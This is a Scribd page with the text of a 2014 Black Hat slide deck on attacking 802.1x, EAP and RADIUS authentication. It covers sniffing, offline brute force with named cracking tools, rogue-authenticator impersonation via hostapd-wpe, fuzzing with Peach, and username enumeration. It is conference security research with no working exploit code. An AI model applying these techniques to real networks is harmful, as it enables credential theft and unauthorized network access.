Scribd Logo
Cargar

¡Te damos la bienvenida a Scribd!

  • 802.1x and Beyond!: Brad Antoniewicz

    Cargado por

    elite
    59 vistas42 páginas
    802.1x-And-Beyond blackhat 2014

    Título original

    802.1x-And-Beyond

    Derechos de autor

    © © All Rights Reserved

    Formatos disponibles

    PDF, TXT o lea en línea desde Scribd

    ¿Le pareció útil este documento?

    ¿Este contenido es inapropiado?

    Denunciar este documento
    802.1x-And-Beyond blackhat 2014

    Copyright:

    © All Rights Reserved
    Descargue como PDF, TXT o lea en línea desde Scribd
    Marcar por contenido inapropiado
    59 vistas42 páginas

    802.1x and Beyond!: Brad Antoniewicz

    Cargado por

    elite
    802.1x-And-Beyond blackhat 2014

    Copyright:

    © All Rights Reserved
    Descargue como PDF, TXT o lea en línea desde Scribd
    Marcar por contenido inapropiado
    de 42

    802.

    1x and
    BEYOND!
    Brad Antoniewicz
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    2
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    Hi, Im @brad_anton


    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    3
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    Agenda
    About 802.1x

    Attacks

    Fuzzing/Tools

    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    4
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    SZ
    y
    IEEE 802.1x
    Port-Based network access control
    Cause not everyone is welcome at church?
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    5
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    Supplicant Authenticator Authentication Server
    Flow
    (IEEE 802.1x)
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    6
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    Wireless Client
    Access Point
    RADIUS Server
    802.11
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    7
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    Wired Client
    Network Switch
    RADIUS Server
    Ethernet
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    8
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    TRUSTED UNTRUSTED
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    9
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    What if I.
    Cisco ACS 4.2
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    10
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone

    `
    EAP
    Extensible Authentication Protocol
    RFC3748
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    11
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    EAP
    802.1x
    (Layer 2)
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    12
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    EAP
    Type:
    PEAP, EAP-TTLS,
    EAP-FAST, etc..
    (Layer 2)
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    13
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    EAP
    RADIUS
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    14
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone

    DALAI LAMA
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    15
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    (layer 3)
    RADIUS
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    16
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    RADIUS
    Remote Access Dial-In User Service
    DSL/Dialup VPN
    RFC2865/2869
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    17
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    Integration
    User Database
    Active Directory
    SecurID
    LDAP

    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    18
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    Surface
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    19
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    Surface
    External Auth Handler
    RADIUS/EAP/Types
    802.1x/EAP/Types
    (Protocol/Configuration/Handling issues)
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    20
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    Surface
    Mgmt Web UI
    Mgmt Web UI
    Mgmt Web UI
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    21
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    Attacks
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    22
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    Sniffing
    Offline Brute-Force
    Shared Secret/User-Password: john
    CHAP: hashcat
    EAP Data..: asleap, and eapmd5pass

    Clear-text Data
    User-name AVP/Eap Ident
    NAS-Id
    Calling-Station
    State

    no need to be fancy, just
    use Wireshark
    (Protocol Issue)
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    23
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    (Configuration Issue)
    Impersonation
    Attacker Controlled
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    24
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    (Configuration Issue)
    FreeRADIUS-WPE
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    25
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    (Configuration Issue)
    hostapd-wpe
    https://github.com/OpenSecurityResearch/hostapd-wpe
    Supports Tons of EAP-Types (including EAP-FAST Phase 0)
    Always Returns EAP-Success
    Requests PAP first
    Responds to all 802.11 probe requests
    Heartbleed (Cupid)
    Saves to file/outputs NETNTLM format

    Thanks to JoMo-Kun, @lgrangeia, and @haxorthematrix for
    Patches/Functionality and improvement suggestions

    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    26
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    27
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    RADIUS/EAP/802.1x
    Fuzz
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    28
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    Peach
    Overview
    DataModel
    StateModel
    Publisher
    Agent
    Agent
    Transformers,
    mutators, etc..
    Targets
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    29
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    DataModels
    EAP
    Eap.xml
    EapFast.xml
    EapGtc.xml
    EapLeap.xml
    EapMd5.xml
    EapMschapv2.xml
    EapPeap.xml
    EapTls.xml
    EapTlv.xml
    RADIUS
    Radius.xml
    Supporting
    Protocols
    Tls.xml
    Mschapv2.xml
    Utilities
    Utils.xml
    802.1x
    Ieee802.1x.xml
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    30
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    DataModel
    Radius.xml
    Cisco ACS
    StateModel
    Tests
    VS DataModel
    TekRADIUS
    StateModel
    Tests
    VS DataModel
    MS NPS/IAS
    StateModel
    Tests
    VS DataModel
    SBR/FreeRadius
    StateModel
    Tests
    VS DataModel
    Fuzzers
    UDPPublisher
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    31
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone

    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    32
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    Publishers
    all via wired, supports all tunneled EAP Types
    RadiusPublisher
    Eap.xml
    RadiusPeapPublisher
    Eap.xml
    EthernetPeapPublisher
    Eap.xml
    RawEthernetPublisher
    Ieee8021x.xml
    T
    L
    S

    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    33
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    Surface
    Mgmt Web UI
    Mgmt Web UI
    Mgmt Web UI
    StringMutator.Data.cs:

    namespace Peach.Core.Mutators
    {
    public partial class StringMutator
    {
    static readonly string[] values = new string[] {
    LDAP Injection
    XSS
    SQL Injection
    CMD Injection
    etc

    }
    }
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    34
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    RADIUS/802.1x/EAP
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    35
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    Tools
    Existing:
    libeap
    Pyradius

    Releasing:
    Radius .Net (forked)
    Eap .Net
    OpenSSL .NET ..i know.. ugh .Net
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    36
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    Libz
    OpenSSL.NET (Fork)
    SslUdp SslClient = new SslUdp(false)
    SslUdp SslSvr= new SslUdp(pub, priv, true)
    SslSvr.Send(ePkt.RawData)
    Eap.NET (New)
    RadiusEapSession eClient = new RadiusEapSession(host, secret)
    EthernetEapSession eSvr = new EthernetEapSession(dev, pub, priv)
    EapPacket ePkt = new EapPacket(bytes) // Recv

    EapPacket ePkt = new EapPacket(Code, Type, ID);
    ePkt.SetEapData(bytes);
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    37
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    Profiling
    AVP-State (RADIUS)
    Maintains State of the Connection
    Active/Passive
    Cisco: acs/Number/Number
    MS NPS: 38 Bytes
    EAP-Res/Ident
    Username
    MS NPS: Will reject if ! valid
    Others: Doesnt matter

    Msg-Auth. (RADIUS)
    Cisco: Ignores
    Others: Access-Reject


    RadiusEapProfiler.exe
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    38
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    Brute-Force
    Password
    a.k.a Active Brute
    Force (..meh)
    Usernames
    NPS: Eap-Resp/Identity

    EAP-Type
    Client Downgrade

    eapEnum.exe
    Or Enumeration whatever
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    39
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone

    wpa_supplicant-wpe
    enumeration/profiles/exploits
    TODO
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    40
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    Dont try to fuzz EAP over WiFi or using
    wpa_supplicant or through an authenticator
    eapol_test is great (make eapol_test in
    wpa_supplicant)
    netsh lan reconnect will start a 802.1x
    connection on Windows 7 and 8.1
    +hpa +ust to find the real goodies





    Notes for the researchers
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    41
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    Exploitation
    &
    www.foundstone.com
    Copyright 2014
    McAfee, Inc.
    42
    Brad.Antoniewicz@foundstone.com @brad_anton @foundstone
    ?
    @brad_anton

    Brad.Antoniewicz@foundstone.com
    *many of the pics in this presentation were found on the
    internet credit goes to images.google.com

    También podría gustarte